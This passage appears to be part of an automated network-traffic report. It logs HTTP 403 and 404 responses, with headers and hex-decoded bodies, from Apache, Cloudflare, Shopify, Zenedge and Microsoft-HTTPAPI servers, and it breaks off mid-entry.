20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:06:48 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jul 2023 06:06:48 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=15X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: a1bbbfac-5685-4b36-8958-1566df11af8dCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oIsxzGagXXaKzNR%2BnZ6TKfgZbObKDRX8dHkEF7jCZ7rvQ23giATMunFiRLVwBhu9cXUSgzhi8ObwaYjCRA%2BnurolEYVle535dwnp1LYAVOoEdZCOKTEE8GdarjvREiQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=147.999763Server: cloudflareCF-RAY: 7e1d6c91388a1909-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:06:48 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jul 2023 06:06:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 171X-Sorting-Hat-ShopId: 61843439788Server-Timing: processing;dur=15X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 95a9312d-7606-4f71-8a59-f141136bcef7CF-Cache-Status: DYNAMICSet-Cookie: __cf_bm=wlbta6Ecisffs_MWqwnmPsj5YqYisX3bPSM2f8CX6tI-1688537209-0-AcxkKBDEugPByMGeiMi9pQn1JLkOkLAmCsBmrE+ezN4xYfOWBSV5OXAoDHZ/LSFv6SLPbDLZrJVw5ZzgPNC7n04=; path=/; expires=Wed, 05-Jul-23 06:36:49 GMT; domain=.www.snugpak.com; HttpOnly; SameSite=NoneReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vb8Ak20MtvRTrE3xPQNh3ZhVUtpRawcmMUZyOgU1bwe3R1Y0uUNwnlKrWW4c1KvAW6PiFFvKRW9QWYYrDIid8QR53zQTgGfKLoaw8svHRflG%2FUBtOVV%2BeMgULMSR%2FgJ6RA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=151.999950Server: cloudflareCF-RAY: 7e1d6c976ee19be9-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Wed, 05 Jul 2023 06:06:44 GMTData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:06:52 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hg1E7rFbFL3X7yrCWENodFvw2TVarqDDPeJlR1oO1yr6MatJVeLgpMKrAQsCqzLCwyXA1ftOLnjf0UNGJ2kG%2B0so%2BRTvPrSrlHEzNO3B%2BmfI9Zv4CDTKNpSxe%2Bsyno2g"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6ca90cee360f-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:06:52 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9Ii7T%2FjVAP12osTS017QffpM%2Brk1rvg2l9OeWk1J2438VmrOqIoWUHD279Z2VyDJOdK7mlNs1DYUnyYCPHxxzImYr9skxBLc3YQU3vJQXrOBM%2FBF4aSku1DWnXS0YrtM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6ca93d3f360f-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jul 2023 06:06:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=16X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 533ed0e9-92a8-4298-b8d2-417e03ca34d3CF-Cache-Status: DYNAMICSet-Cookie: __cf_bm=y2eeZyENc0TS0UI8ntUogIEKdmwWD70ovP2GSvs.460-1688537212-0-AUZoqT/zK7m5v+Q5yHXkCRdTW3IH1FUkkEvyODhas+pyQ9no7IylVZsmfrdaG7zOvWIBdCrxqWauAr9M1Vh+zgE=; path=/; expires=Wed, 05-Jul-23 06:36:52 GMT; domain=.www.domon.com; HttpOnly; SameSite=NoneReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BfypMaBo1gc2zs9sfqVFhyTUufYbbj87LphEuDRpPiNqb2%2BsJRjTn0DDg7aywYcIBiClym1ZueySA8k3mywK1XbfY%2BRzVZpcJR6u42Tmi1p5vjPaS4uA5QA0CTDQb5c%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=148.999929Server: cloudflareCF-RAY: 7e1d6ca8fe96924a-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:06:59 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:06:59 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qoxXvsVQH2yLr2Eo4Bk%2FvvwY5Ujh62GGv6IxggxZjzDi7DC7%2BZGZl9kHhtUmPL5xLPxMIixI%2B%2FEEjmYnN%2BWQ%2BsgeUruoQIoyY4Fip57NbDT%2FtFwrMHmxjYpq8N91odk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6cd3da6d9bb2-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:06:59 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=N3Gt4%2Bq3hWlTJDRqUFU%2Fa8WOgata86HHDKsjpKNk8HesXJez2anb0DUZD0Is279vxuoYJv0B9zVGI6%2BRcAblOamztm711aY7acyoHLcFL5wWRD9tfM9OrK9m0N9Rg8I%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6cd42af29bb2-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:06:59 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:06:59 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0Date: Wed, 05 Jul 2023 06:06:59 GMTX-Cache-Status: Server: ZENEDGEX-Zen-Fury: 431985ab9debbe9a84c984b122658ea98664223fData Raw: 32 61 61 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 36 31 38 33 22 2c 20 31 36 38 38 35 33 37 32 31 39 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 76 61 72 20 76 20 3d 20 31 36 38 38 35 33 37 31 35 38 20 2a 20 33 2e 31 34 31 35 39 32 36 35 33 35 38 39 38 3b 20 76 20 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 76 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 5f 5f 7a 6a 63 37 31 33 39 3d 22 2b 76 2b 22 3b 20 65 78 70 69 72 65 73 3d 57 65 64 2c 20 30 35 20 4a 75 6c 20 32 30 32 33 20 30 36 3a 30 38 3a 35 39 20 55 54 43 3b 20 70 61 74 68 3d 2f 22 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 2aa<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC6183", 1688537219, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script><script>(function () { var v = 1688537158 * 3.1415926535898; v = Math.floor(v); do
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:06:59 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 05 Jul 2023 06:07:13 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:04 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
